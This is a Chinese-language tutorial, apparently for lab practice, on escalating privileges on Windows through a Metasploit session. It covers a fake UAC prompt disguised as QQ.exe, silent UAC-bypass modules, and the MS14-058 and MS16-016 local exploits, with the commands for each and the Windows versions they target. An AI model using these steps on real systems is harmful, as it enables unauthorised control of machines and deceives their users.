UAC提权
当获得一个低权限的sessions时,这里是管理员权限,想进一步提升权限,可以使用UAC的方法,是因为此时无法通过getsystem直接提权
首先background让当前session后台运行
进入下面这个模块
use Exploit/windows/local/ask
set session (此时session对应id)
set filename QQ.exe(靶机上将要弹出的uac)
exploit
此时在靶机上出现一个exe文件可执行请求提醒,当点击是后,kali上会获得一个session
进入这个session
首先输入sessions查看所有获取到的session,然后进入对应会话session,命令是sessions -i (对应id)
执行getuid发现仍是管理员权限,但是不要担心,再次执行getsystem将获得system权限
但是这样的方式并不好,用户很明显可以看到这样的请求,稍微有些意识的用户都会拒绝点击,因此我们可以尝试bypass uac的方式,不与用户直接交互,而metasploit中就正好提供了这样的模块
MSF模块
exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_vbs
我们这里就用bypassuac模块
只需设置session即可
set session (session为对应低权限的id)
我们也可以看到这个模块可以对32位和64位的电脑都有效
exploit后我们可以收到一个session,再次执行进入,重复上述提权步骤,将得到system权限(这里不放图了),而靶机那边没有任何反应
至此UACbypass提权成功
附加两个本地提权漏洞
利用本地提权漏洞
search ms14_058
use exploit/windows/local/ms14_058_track_popup_menu
设置session即可
exploit后得到session,这里都不用再执行getsystem的命令,直接得到system权限
可在winxp sp3,win2003 sp2,win7 sp1,win8 32位上执行
search ms16_016
use exploit/windows/local/ms16_016_webdav
设置session即可
exploit后得到session,这里都不用再执行getsystem的命令,直接得到system权限
可在win7 sp1上执行